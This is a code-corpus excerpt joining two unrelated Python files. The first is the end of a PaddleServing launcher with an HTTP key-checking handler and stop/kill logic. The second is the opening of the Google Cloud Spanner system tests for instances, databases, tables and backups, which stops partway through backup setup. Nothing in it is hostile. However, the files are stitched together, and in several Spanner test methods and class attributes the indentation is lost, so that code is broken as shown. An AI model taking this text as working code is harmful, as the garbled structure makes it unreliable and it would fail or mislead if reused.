        # First request: store the key (when encryption is on) and fork the
        # serving process.  Subsequent requests only re-validate the key.
        post_data = json.loads(post_data.decode('utf-8'))
        global p_flag
        if not p_flag:
            if args.use_encryption_model:
                print("waiting key for model")
                if not self.get_key(post_data):
                    print("not found key in request")
                    return False
            global serving_port
            global p
            serving_port = self.get_available_port()
            p = Process(target=self.start_serving)
            p.start()
            # Give the child a moment to come up before checking liveness.
            time.sleep(3)
            if p.is_alive():
                p_flag = True
            else:
                return False
        else:
            if p.is_alive():
                if not self.check_key(post_data):
                    return False
            else:
                return False
        return True

    def do_POST(self):
        # Single endpoint: on success reply with the port the server runs on.
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        if self.start(post_data):
            response = {"endpoint_list": [serving_port]}
        else:
            response = {"message": "start serving failed"}
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(response).encode())
def stop_serving(command : str, port : int = None):
    '''
    Stop PaddleServing by port.

    Args:
        command(str): stop->SIGINT, kill->SIGKILL
        port(int): Default to None, kill all processes in ProcessInfo.json.
            Not None, kill the specific process relating to port

    Returns:
        True if stop serving successfully.
        False if error occured

    Examples:
    ..  code-block:: python

        stop_serving("stop", 9494)
    '''
    filepath = os.path.join(CONF_HOME, "ProcessInfo.json")
    infoList = load_pid_file(filepath)
    # load_pid_file signals a missing/unreadable bookkeeping file with False.
    if infoList is False:
        return False
    lastInfo = infoList[-1]
    for info in infoList:
        # NOTE(review): info["port"] appears to be a collection of ports
        # (membership test below) — confirm against dump_pid_file's schema.
        storedPort = info["port"]
        pid = info["pid"]
        # model/start_time are extracted but not used here.
        model = info["model"]
        start_time = info["start_time"]
        if port is not None:
            if port in storedPort:
                kill_stop_process_by_pid(command ,pid)
                # Drop this entry and rewrite (or remove) the bookkeeping file.
                # Returning immediately makes the in-loop remove() safe.
                infoList.remove(info)
                if len(infoList):
                    with open(filepath, "w") as fp:
                        json.dump(infoList, fp)
                else:
                    os.remove(filepath)
                return True
            else:
                # Only complain once we have scanned every recorded entry.
                if lastInfo == info:
                    raise ValueError(
                        "Please confirm the port [%s] you specified is correct." %
                        port)
                else:
                    pass
        else:
            # No port given: stop every recorded process, then drop the file.
            kill_stop_process_by_pid(command ,pid)
            if lastInfo == info:
                os.remove(filepath)
    return True
if __name__ == "__main__":
    # args.device is not used at all.
    # just keep the interface.
    # so --device should not be recommended at the HomePage.
    args = serve_args()
    if args.server == "stop" or args.server == "kill":
        if "--port" in sys.argv:
            result = stop_serving(args.server, args.port)
        else:
            result = stop_serving(args.server)
        # BUG FIX: stop_serving() returns True on success and False on
        # failure, but the original tested `result == 0` — True for a False
        # result — so a successful stop exited with -1 and a failed stop
        # exited with 0.  Exit 0 on success, -1 on failure.
        if result:
            os._exit(0)
        else:
            os._exit(-1)
    # Models must be directories, never plain files.
    for single_model_config in args.model:
        if os.path.isdir(single_model_config):
            pass
        elif os.path.isfile(single_model_config):
            raise ValueError("The input of --model should be a dir not file.")
    # Record our pid/port so a later "stop"/"kill" invocation can find us.
    if port_is_available(args.port):
        portList = [args.port]
        dump_pid_file(portList, args.model)
    if args.use_encryption_model:
        # Globals consumed by MainService: child process + startup state.
        p_flag = False
        p = None
        serving_port = 0
        server = HTTPServer(('0.0.0.0', int(args.port)), MainService)
        print(
            'Starting encryption server, waiting for key from client, use <Ctrl-C> to stop'
        )
        server.serve_forever()
    else:
        start_multi_card(args)
|
test_system.py | # Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import decimal
import math
import operator
import os
import struct
import threading
import time
import unittest
import uuid
import grpc
from google.rpc import code_pb2
from google.api_core import exceptions
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
from google.cloud.spanner_v1 import param_types
from google.cloud.spanner_v1 import TypeCode
from google.cloud.spanner_v1 import Type
from google.cloud._helpers import UTC
from google.cloud.spanner_v1 import BurstyPool
from google.cloud.spanner_v1 import COMMIT_TIMESTAMP
from google.cloud.spanner_v1 import Client
from google.cloud.spanner_v1 import KeyRange
from google.cloud.spanner_v1 import KeySet
from google.cloud.spanner_v1.instance import Backup
from google.cloud.spanner_v1.instance import Instance
from google.cloud.spanner_v1.table import Table
from google.cloud.spanner_v1 import RequestOptions
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
from tests._fixtures import EMULATOR_DDL_STATEMENTS
from tests._helpers import OpenTelemetryBase, HAS_OPENTELEMETRY_INSTALLED
# --- Environment-driven configuration for this system-test run ---------------
# Create a fresh Spanner instance instead of reusing an existing one.
CREATE_INSTANCE = os.getenv("GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE") is not None
# Target the local emulator instead of the real service.
USE_EMULATOR = os.getenv("SPANNER_EMULATOR_HOST") is not None
SKIP_BACKUP_TESTS = os.getenv("SKIP_BACKUP_TESTS") is not None
# Timeout (seconds) applied to long-running admin operations.
SPANNER_OPERATION_TIMEOUT_IN_SECONDS = int(
    os.getenv("SPANNER_OPERATION_TIMEOUT_IN_SECONDS", 60)
)
if CREATE_INSTANCE:
    INSTANCE_ID = "google-cloud" + unique_resource_id("-")
else:
    INSTANCE_ID = os.environ.get(
        "GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE", "google-cloud-python-systest"
    )
MULTI_REGION_INSTANCE_ID = "multi-region" + unique_resource_id("-")
# Filled by setUpModule with the instances that existed before the run.
EXISTING_INSTANCES = []
COUNTERS_TABLE = "counters"
COUNTERS_COLUMNS = ("name", "value")
# Span attributes expected by the OpenTelemetry assertions.
BASE_ATTRIBUTES = {
    "db.type": "spanner",
    "db.url": "spanner.googleapis.com",
    "net.host.name": "spanner.googleapis.com",
}
# Map from a numeric status code to the corresponding grpc.StatusCode member.
_STATUS_CODE_TO_GRPC_STATUS_CODE = {
    member.value[0]: member for member in grpc.StatusCode
}
class Config(object):
    """Run-time configuration to be modified at set-up.

    This is a mutable stand-in to allow test set-up to modify
    global state.
    """

    # All three are populated by setUpModule before any test runs.
    CLIENT = None
    INSTANCE_CONFIG = None
    INSTANCE = None
def _has_all_ddl(database):
    """Return True once the database reports the full fixture DDL set."""
    expected = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
    return len(database.ddl_statements) == len(expected)
def _list_instances():
    """Materialize the shared client's instance iterator into a list."""
    return [instance for instance in Config.CLIENT.list_instances()]
def setUpModule():
    """Create the shared Spanner client/instance and reap stale test instances."""
    if USE_EMULATOR:
        # The emulator accepts anonymous credentials.
        from google.auth.credentials import AnonymousCredentials

        emulator_project = os.getenv("GCLOUD_PROJECT", "emulator-test-project")
        Config.CLIENT = Client(
            project=emulator_project, credentials=AnonymousCredentials()
        )
    else:
        Config.CLIENT = Client()
    retry = RetryErrors(exceptions.ServiceUnavailable)
    configs = list(retry(Config.CLIENT.list_instance_configs)())
    instances = retry(_list_instances)()
    EXISTING_INSTANCES[:] = instances

    # Delete test instances that are older than an hour.
    cutoff = int(time.time()) - 1 * 60 * 60
    instance_pbs = Config.CLIENT.list_instances("labels.python-spanner-systests:true")
    for instance_pb in instance_pbs:
        instance = Instance.from_pb(instance_pb, Config.CLIENT)
        if "created" not in instance.labels:
            continue
        create_time = int(instance.labels["created"])
        if create_time > cutoff:
            continue
        # Instance cannot be deleted while backups exist.
        for backup_pb in instance.list_backups():
            backup = Backup.from_pb(backup_pb, instance)
            backup.delete()
        instance.delete()

    if CREATE_INSTANCE:
        if not USE_EMULATOR:
            # Defend against back-end returning configs for regions we aren't
            # actually allowed to use.
            configs = [config for config in configs if "-us-" in config.name]
        if not configs:
            raise ValueError("List instance configs failed in module set up.")
        Config.INSTANCE_CONFIG = configs[0]
        config_name = configs[0].name
        # Label with a creation timestamp so stale instances can be reaped.
        create_time = str(int(time.time()))
        labels = {"python-spanner-systests": "true", "created": create_time}
        Config.INSTANCE = Config.CLIENT.instance(
            INSTANCE_ID, config_name, labels=labels
        )
        created_op = Config.INSTANCE.create()
        created_op.result(
            SPANNER_OPERATION_TIMEOUT_IN_SECONDS
        )  # block until completion
    else:
        # Reuse a pre-existing instance rather than creating a new one.
        Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
        Config.INSTANCE.reload()
def tearDownModule():
    # Only delete the instance when this run created it (see setUpModule).
    if CREATE_INSTANCE:
        Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
    """System tests for instance-admin operations (list/reload/create/update)."""

    def setUp(self):
        # Instances created by a test register themselves here for teardown.
        self.instances_to_delete = []

    def tearDown(self):
        for instance in self.instances_to_delete:
            instance.delete()

    @unittest.skipIf(
        CREATE_INSTANCE, "This test fails when system tests are run in parallel."
    )
    def test_list_instances(self):
        instances = list(Config.CLIENT.list_instances())
        # We have added one new instance in `setUpModule`.
        if CREATE_INSTANCE:
            self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
        # Every listed instance must be either pre-existing or the one we made.
        for instance in instances:
            instance_existence = (
                instance in EXISTING_INSTANCES or instance == Config.INSTANCE
            )
            self.assertTrue(instance_existence)

    def test_reload_instance(self):
        # Use same arguments as Config.INSTANCE (created in `setUpModule`)
        # so we can use reload() on a fresh instance.
        instance = Config.CLIENT.instance(INSTANCE_ID)
        # Make sure metadata unset before reloading.
        instance.display_name = None

        def _expected_display_name(instance):
            # Retry predicate: keep reloading until the display name matches.
            return instance.display_name == Config.INSTANCE.display_name

        retry = RetryInstanceState(_expected_display_name)
        retry(instance.reload)()
        self.assertEqual(instance.display_name, Config.INSTANCE.display_name)

    @unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
    def test_create_instance(self):
        ALT_INSTANCE_ID = "new" + unique_resource_id("-")
        instance = Config.CLIENT.instance(ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
        operation = instance.create()
        # Make sure this instance gets deleted after the test case.
        self.instances_to_delete.append(instance)
        # We want to make sure the operation completes.
        operation.result(
            SPANNER_OPERATION_TIMEOUT_IN_SECONDS
        )  # raises on failure / timeout.
        # Create a new instance instance and make sure it is the same.
        instance_alt = Config.CLIENT.instance(
            ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
        )
        instance_alt.reload()
        self.assertEqual(instance, instance_alt)
        self.assertEqual(instance.display_name, instance_alt.display_name)

    @unittest.skipIf(USE_EMULATOR, "Skipping LCI tests")
    @unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
    def test_create_instance_with_processing_nodes(self):
        ALT_INSTANCE_ID = "new" + unique_resource_id("-")
        PROCESSING_UNITS = 5000
        instance = Config.CLIENT.instance(
            instance_id=ALT_INSTANCE_ID,
            configuration_name=Config.INSTANCE_CONFIG.name,
            processing_units=PROCESSING_UNITS,
        )
        operation = instance.create()
        # Make sure this instance gets deleted after the test case.
        self.instances_to_delete.append(instance)
        # We want to make sure the operation completes.
        operation.result(
            SPANNER_OPERATION_TIMEOUT_IN_SECONDS
        )  # raises on failure / timeout.
        # Create a new instance instance and make sure it is the same.
        instance_alt = Config.CLIENT.instance(
            ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
        )
        instance_alt.reload()
        self.assertEqual(instance, instance_alt)
        self.assertEqual(instance.display_name, instance_alt.display_name)
        self.assertEqual(instance.processing_units, instance_alt.processing_units)

    @unittest.skipIf(USE_EMULATOR, "Skipping updating instance")
    def test_update_instance(self):
        OLD_DISPLAY_NAME = Config.INSTANCE.display_name
        NEW_DISPLAY_NAME = "Foo Bar Baz"
        Config.INSTANCE.display_name = NEW_DISPLAY_NAME
        operation = Config.INSTANCE.update()
        # We want to make sure the operation completes.
        operation.result(
            SPANNER_OPERATION_TIMEOUT_IN_SECONDS
        )  # raises on failure / timeout.
        # Create a new instance instance and reload it.
        instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
        self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
        instance_alt.reload()
        self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
        # Make sure to put the instance back the way it was for the
        # other test cases.
        Config.INSTANCE.display_name = OLD_DISPLAY_NAME
        Config.INSTANCE.update()
class _TestData(object):
    # Shared fixture data plus row/cell comparison helpers, mixed into
    # unittest.TestCase subclasses (relies on their assert* methods).
    TABLE = "contacts"
    COLUMNS = ("contact_id", "first_name", "last_name", "email")
    ROW_DATA = (
        (1, u"Phred", u"Phlyntstone", u"phred@example.com"),
        (2, u"Bharney", u"Rhubble", u"bharney@example.com"),
        (3, u"Wylma", u"Phlyntstone", u"wylma@example.com"),
    )
    ALL = KeySet(all_=True)
    SQL = "SELECT * FROM contacts ORDER BY contact_id"
    # When True, list-valued cells are compared element-wise, recursively.
    _recurse_into_lists = True

    def _assert_timestamp(self, value, nano_value):
        # `value` is the expected naive datetime; `nano_value` is the
        # UTC-aware (possibly nanosecond-precision) value read back.
        self.assertIsInstance(value, datetime.datetime)
        self.assertIsNone(value.tzinfo)
        self.assertIs(nano_value.tzinfo, UTC)
        self.assertEqual(value.year, nano_value.year)
        self.assertEqual(value.month, nano_value.month)
        self.assertEqual(value.day, nano_value.day)
        self.assertEqual(value.hour, nano_value.hour)
        self.assertEqual(value.minute, nano_value.minute)
        self.assertEqual(value.second, nano_value.second)
        self.assertEqual(value.microsecond, nano_value.microsecond)
        if isinstance(value, DatetimeWithNanoseconds):
            self.assertEqual(value.nanosecond, nano_value.nanosecond)
        else:
            # The expected value only carries microsecond precision.
            self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)

    def _check_rows_data(self, rows_data, expected=None):
        # Compare a whole result set against `expected` (defaults to ROW_DATA).
        if expected is None:
            expected = self.ROW_DATA
        self.assertEqual(len(rows_data), len(expected))
        for row, expected in zip(rows_data, expected):
            self._check_row_data(row, expected)

    def _check_row_data(self, row_data, expected):
        self.assertEqual(len(row_data), len(expected))
        for found_cell, expected_cell in zip(row_data, expected):
            self._check_cell_data(found_cell, expected_cell)

    def _check_cell_data(self, found_cell, expected_cell):
        # Cell equality with special cases: nanosecond timestamps, NaN
        # (NaN != NaN under ==), and recursive list comparison.
        if isinstance(found_cell, DatetimeWithNanoseconds):
            self._assert_timestamp(expected_cell, found_cell)
        elif isinstance(found_cell, float) and math.isnan(found_cell):
            self.assertTrue(math.isnan(expected_cell))
        elif isinstance(found_cell, list) and self._recurse_into_lists:
            self.assertEqual(len(found_cell), len(expected_cell))
            for found_item, expected_item in zip(found_cell, expected_cell):
                self._check_cell_data(found_item, expected_item)
        else:
            self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
    @classmethod
    def setUpClass(cls):
        """Create the class-wide test database and a multi-region instance."""
        pool = BurstyPool(labels={"testcase": "database_api"})
        ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
        cls._db = Config.INSTANCE.database(
            cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
        )
        operation = cls._db.create()
        operation.result(
            SPANNER_OPERATION_TIMEOUT_IN_SECONDS
        )  # raises on failure / timeout.
        # Create a multi-region instance
        multi_region_config = "nam3"
        config_name = "{}/instanceConfigs/{}".format(
            Config.CLIENT.project_name, multi_region_config
        )
        create_time = str(int(time.time()))
        labels = {"python-spanner-systests": "true", "created": create_time}
        cls._instance = Config.CLIENT.instance(
            instance_id=MULTI_REGION_INSTANCE_ID,
            configuration_name=config_name,
            labels=labels,
        )
        operation = cls._instance.create()
        operation.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
    @classmethod
    def tearDownClass(cls):
        # Drop the shared database, then delete the multi-region instance.
        cls._db.drop()
        cls._instance.delete()
    def setUp(self):
        # Databases created by a test register themselves here for teardown.
        self.to_delete = []
    def tearDown(self):
        # Drop every database the test created.
        for doomed in self.to_delete:
            doomed.drop()
    def test_list_databases(self):
        # Since `Config.INSTANCE` is newly created in `setUpModule`, the
        # database created in `setUpClass` here will be the only one.
        database_names = [
            database.name for database in Config.INSTANCE.list_databases()
        ]
        self.assertTrue(self._db.name in database_names)
    def test_create_database(self):
        """A newly created database appears in list_databases()."""
        pool = BurstyPool(labels={"testcase": "create_database"})
        temp_db_id = "temp_db" + unique_resource_id("_")
        temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
        operation = temp_db.create()
        self.to_delete.append(temp_db)
        # We want to make sure the operation completes.
        operation.result(
            SPANNER_OPERATION_TIMEOUT_IN_SECONDS
        )  # raises on failure / timeout.
        database_ids = [database.name for database in Config.INSTANCE.list_databases()]
        self.assertIn(temp_db.name, database_ids)
    @unittest.skipIf(
        USE_EMULATOR, "PITR-lite features are not supported by the emulator"
    )
    def test_create_database_pitr_invalid_retention_period(self):
        """A zero-day version retention period must be rejected by the backend."""
        pool = BurstyPool(labels={"testcase": "create_database_pitr"})
        temp_db_id = "temp_db" + unique_resource_id("_")
        retention_period = "0d"
        ddl_statements = [
            "ALTER DATABASE {}"
            " SET OPTIONS (version_retention_period = '{}')".format(
                temp_db_id, retention_period
            )
        ]
        temp_db = Config.INSTANCE.database(
            temp_db_id, pool=pool, ddl_statements=ddl_statements
        )
        with self.assertRaises(exceptions.InvalidArgument):
            temp_db.create()
    @unittest.skipIf(
        USE_EMULATOR, "PITR-lite features are not supported by the emulator"
    )
    def test_create_database_pitr_success(self):
        """A 7-day retention period round-trips via reload() and via SQL."""
        pool = BurstyPool(labels={"testcase": "create_database_pitr"})
        temp_db_id = "temp_db" + unique_resource_id("_")
        retention_period = "7d"
        ddl_statements = [
            "ALTER DATABASE {}"
            " SET OPTIONS (version_retention_period = '{}')".format(
                temp_db_id, retention_period
            )
        ]
        temp_db = Config.INSTANCE.database(
            temp_db_id, pool=pool, ddl_statements=ddl_statements
        )
        operation = temp_db.create()
        self.to_delete.append(temp_db)
        # We want to make sure the operation completes.
        operation.result(30)  # raises on failure / timeout.
        database_ids = [database.name for database in Config.INSTANCE.list_databases()]
        self.assertIn(temp_db.name, database_ids)
        temp_db.reload()
        self.assertEqual(temp_db.version_retention_period, retention_period)
        # The option must also be visible through INFORMATION_SCHEMA.
        with temp_db.snapshot() as snapshot:
            results = snapshot.execute_sql(
                "SELECT OPTION_VALUE AS version_retention_period "
                "FROM INFORMATION_SCHEMA.DATABASE_OPTIONS "
                "WHERE SCHEMA_NAME = '' AND OPTION_NAME = 'version_retention_period'"
            )
            for result in results:
                self.assertEqual(result[0], retention_period)
    @unittest.skipIf(
        USE_EMULATOR, "Default leader setting is not supported by the emulator"
    )
    def test_create_database_with_default_leader_success(self):
        """The default_leader option round-trips via reload() and via SQL."""
        pool = BurstyPool(labels={"testcase": "create_database_default_leader"})
        temp_db_id = "temp_db" + unique_resource_id("_")
        default_leader = "us-east4"
        ddl_statements = [
            "ALTER DATABASE {}"
            " SET OPTIONS (default_leader = '{}')".format(temp_db_id, default_leader)
        ]
        # Uses the multi-region instance created in setUpClass.
        temp_db = self._instance.database(
            temp_db_id, pool=pool, ddl_statements=ddl_statements
        )
        operation = temp_db.create()
        self.to_delete.append(temp_db)
        # We want to make sure the operation completes.
        operation.result(30)  # raises on failure / timeout.
        database_ids = [database.name for database in self._instance.list_databases()]
        self.assertIn(temp_db.name, database_ids)
        temp_db.reload()
        self.assertEqual(temp_db.default_leader, default_leader)
        # The option must also be visible through INFORMATION_SCHEMA.
        with temp_db.snapshot() as snapshot:
            results = snapshot.execute_sql(
                "SELECT OPTION_VALUE AS default_leader "
                "FROM INFORMATION_SCHEMA.DATABASE_OPTIONS "
                "WHERE SCHEMA_NAME = '' AND OPTION_NAME = 'default_leader'"
            )
            for result in results:
                self.assertEqual(result[0], default_leader)
def test_table_not_found(self):
temp_db_id = "temp_db" + unique_resource_id("_")
correct_table = "MyTable"
incorrect_table = "NotMyTable"
self.assertNotEqual(correct_table, incorrect_table)
create_table = (
"CREATE TABLE {} (\n"
" Id STRING(36) NOT NULL,\n"
" Field1 STRING(36) NOT NULL\n"
") PRIMARY KEY (Id)"
).format(correct_table)
index = "CREATE INDEX IDX ON {} (Field1)".format(incorrect_table)
temp_db = Config.INSTANCE.database(
temp_db_id, ddl_statements=[create_table, index]
)
self.to_delete.append(temp_db)
with self.assertRaises(exceptions.NotFound):
temp_db.create()
@unittest.skip(
(
"update_dataset_ddl() has a flaky timeout"
"https://github.com/GoogleCloudPlatform/google-cloud-python/issues/"
"5629"
)
)
def test_update_database_ddl_with_operation_id(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
# random but shortish always start with letter
operation_id = "a" + str(uuid.uuid4())[:8]
operation = temp_db.update_ddl(ddl_statements, operation_id=operation_id)
self.assertEqual(operation_id, operation.operation.name.split("/")[-1])
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
    @unittest.skipIf(
        USE_EMULATOR, "PITR-lite features are not supported by the emulator"
    )
    def test_update_database_ddl_pitr_invalid(self):
        """A version_retention_period of "0d" must be rejected with
        InvalidArgument by update_ddl()."""
        pool = BurstyPool(labels={"testcase": "update_database_ddl_pitr"})
        temp_db_id = "temp_db" + unique_resource_id("_")
        # "0d" is below the minimum retention the backend accepts.
        retention_period = "0d"
        temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
        create_op = temp_db.create()
        self.to_delete.append(temp_db)
        # We want to make sure the operation completes.
        create_op.result(240)  # raises on failure / timeout.
        # A fresh database has no retention period configured.
        self.assertIsNone(temp_db.version_retention_period)
        ddl_statements = DDL_STATEMENTS + [
            "ALTER DATABASE {}"
            " SET OPTIONS (version_retention_period = '{}')".format(
                temp_db_id, retention_period
            )
        ]
        with self.assertRaises(exceptions.InvalidArgument):
            temp_db.update_ddl(ddl_statements)
    @unittest.skipIf(
        USE_EMULATOR, "PITR-lite features are not supported by the emulator"
    )
    def test_update_database_ddl_pitr_success(self):
        """update_ddl() can set a valid version_retention_period ("7d") and
        the value is visible after reload()."""
        pool = BurstyPool(labels={"testcase": "update_database_ddl_pitr"})
        temp_db_id = "temp_db" + unique_resource_id("_")
        retention_period = "7d"
        temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
        create_op = temp_db.create()
        self.to_delete.append(temp_db)
        # We want to make sure the operation completes.
        create_op.result(240)  # raises on failure / timeout.
        # A fresh database has no retention period configured.
        self.assertIsNone(temp_db.version_retention_period)
        ddl_statements = DDL_STATEMENTS + [
            "ALTER DATABASE {}"
            " SET OPTIONS (version_retention_period = '{}')".format(
                temp_db_id, retention_period
            )
        ]
        operation = temp_db.update_ddl(ddl_statements)
        # We want to make sure the operation completes.
        operation.result(240)  # raises on failure / timeout.
        temp_db.reload()
        self.assertEqual(temp_db.version_retention_period, retention_period)
        self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
    @unittest.skipIf(
        USE_EMULATOR, "Default leader update is not supported by the emulator"
    )
    def test_update_database_ddl_default_leader_success(self):
        """update_ddl() can set ``default_leader`` on an existing database."""
        pool = BurstyPool(labels={"testcase": "update_database_ddl_default_leader"})
        temp_db_id = "temp_db" + unique_resource_id("_")
        default_leader = "us-east4"
        temp_db = self._instance.database(temp_db_id, pool=pool)
        create_op = temp_db.create()
        self.to_delete.append(temp_db)
        # We want to make sure the operation completes.
        create_op.result(240)  # raises on failure / timeout.
        # A fresh database has no default leader configured.
        self.assertIsNone(temp_db.default_leader)
        ddl_statements = DDL_STATEMENTS + [
            "ALTER DATABASE {}"
            " SET OPTIONS (default_leader = '{}')".format(temp_db_id, default_leader)
        ]
        operation = temp_db.update_ddl(ddl_statements)
        # We want to make sure the operation completes.
        operation.result(240)  # raises on failure / timeout.
        temp_db.reload()
        self.assertEqual(temp_db.default_leader, default_leader)
        self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(from_snap)
    def test_db_run_in_transaction_then_snapshot_execute_sql(self):
        """Writes committed via run_in_transaction() are visible to a later
        strong snapshot query."""
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        with self._db.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        def _unit_of_work(transaction, test):
            # Table was emptied above, so the read must return nothing.
            rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
            test.assertEqual(rows, [])
            transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
        self._db.run_in_transaction(_unit_of_work, test=self)
        with self._db.snapshot() as after:
            rows = list(after.execute_sql(self.SQL))
        self._check_rows_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
    def test_db_run_in_transaction_twice_4181(self):
        """Regression test for issue #4181: after an AlreadyExists failure,
        the same unit of work must still succeed for a different key."""
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        with self._db.batch() as batch:
            batch.delete(COUNTERS_TABLE, self.ALL)
        def _unit_of_work(transaction, name):
            transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
        self._db.run_in_transaction(_unit_of_work, name="id_1")
        # A plain insert of the same key must fail...
        with self.assertRaises(exceptions.AlreadyExists):
            self._db.run_in_transaction(_unit_of_work, name="id_1")
        # ...but a different key must still succeed.
        self._db.run_in_transaction(_unit_of_work, name="id_2")
        with self._db.snapshot() as after:
            rows = list(after.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
        self.assertEqual(len(rows), 2)
class TestTableAPI(unittest.TestCase, _TestData):
    """System tests for the table admin API: existence checks, listing,
    reload, and schema introspection against one shared database."""

    DATABASE_NAME = "test_database" + unique_resource_id("_")

    @classmethod
    def setUpClass(cls):
        # Provision a single database shared by every test in this class.
        session_pool = BurstyPool(labels={"testcase": "database_api"})
        ddl = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
        cls._db = Config.INSTANCE.database(
            cls.DATABASE_NAME, ddl_statements=ddl, pool=session_pool
        )
        create_op = cls._db.create()
        create_op.result(30)  # raises on failure / timeout.

    @classmethod
    def tearDownClass(cls):
        cls._db.drop()

    def test_exists(self):
        self.assertTrue(Table("all_types", self._db).exists())

    def test_exists_not_found(self):
        self.assertFalse(Table("table_does_not_exist", self._db).exists())

    def test_list_tables(self):
        listed_ids = {table.table_id for table in self._db.list_tables()}
        for expected in ("contacts", "contact_phones", "all_types"):
            self.assertIn(expected, listed_ids)

    def test_list_tables_reload(self):
        for table in self._db.list_tables():
            self.assertTrue(table.exists())
            self.assertIsInstance(table.schema, list)

    def test_reload_not_found(self):
        missing = Table("table_does_not_exist", self._db)
        with self.assertRaises(exceptions.NotFound):
            missing.reload()

    def test_schema(self):
        fields = Table("all_types", self._db).schema
        names_and_types = {(field.name, field.type_.code) for field in fields}
        expected_pairs = (
            ("pkey", TypeCode.INT64),
            ("int_value", TypeCode.INT64),
            ("int_array", TypeCode.ARRAY),
            ("bool_value", TypeCode.BOOL),
            ("bytes_value", TypeCode.BYTES),
            ("date_value", TypeCode.DATE),
            ("float_value", TypeCode.FLOAT64),
            ("string_value", TypeCode.STRING),
            ("timestamp_value", TypeCode.TIMESTAMP),
        )
        for pair in expected_pairs:
            self.assertIn(pair, names_and_types)
@unittest.skipIf(USE_EMULATOR, "Skipping backup tests")
@unittest.skipIf(SKIP_BACKUP_TESTS, "Skipping backup tests")
class TestBackupAPI(unittest.TestCase, _TestData):
    """System tests for backup create / cancel / update / list / restore.

    ``setUpClass`` provisions two source databases, one extra instance with
    the *same* config, and — when one is available — an instance with a
    *different* config so cross-config restore failures can be exercised.
    """

    DATABASE_NAME = "test_database" + unique_resource_id("_")
    DATABASE_NAME_2 = "test_database2" + unique_resource_id("_")

    @classmethod
    def setUpClass(cls):
        from datetime import datetime

        pool = BurstyPool(labels={"testcase": "database_api"})
        ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
        db1 = Config.INSTANCE.database(
            cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
        )
        db2 = Config.INSTANCE.database(cls.DATABASE_NAME_2, pool=pool)
        cls._db = db1
        cls._dbs = [db1, db2]
        op1 = db1.create()
        op2 = db2.create()
